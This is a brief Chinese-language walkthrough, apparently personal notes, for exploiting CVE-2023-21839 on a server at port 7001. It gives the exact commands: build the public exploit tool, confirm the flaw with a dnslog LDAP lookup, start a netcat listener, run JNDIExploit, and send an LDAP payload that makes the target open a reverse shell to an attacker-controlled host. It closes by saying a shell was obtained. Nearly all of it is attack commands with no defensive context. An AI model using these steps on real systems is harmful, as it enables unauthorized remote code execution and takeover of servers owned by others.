https://github.com/4ra1n/CVE-2023-21839下载之后
生成CVE-2023-21389.exe
先试试dnslog:
CVE-2023-21839.exe -ip 116.xx.xx.xx -port 7001 -ldap ldap://whoami.eduvck.dnslog.cn/aa
然后使用JNDIExploit-1.4-SNAPSHOT.jar进行攻击
另一个终端上
首先开启监听
nc -lvp 5858
然后用JNDIExploit-1.4-SNAPSHOT.jar监听jndi端口
然后执行exp
CVE-2023-21839.exe -ip 116.xx.xx.xx -port 7001 -ldap ldap://47.xx.xx.xx:1389/Basic/ReverseShell/47.xx.xx.xx/5858
这样就成功弹回了shell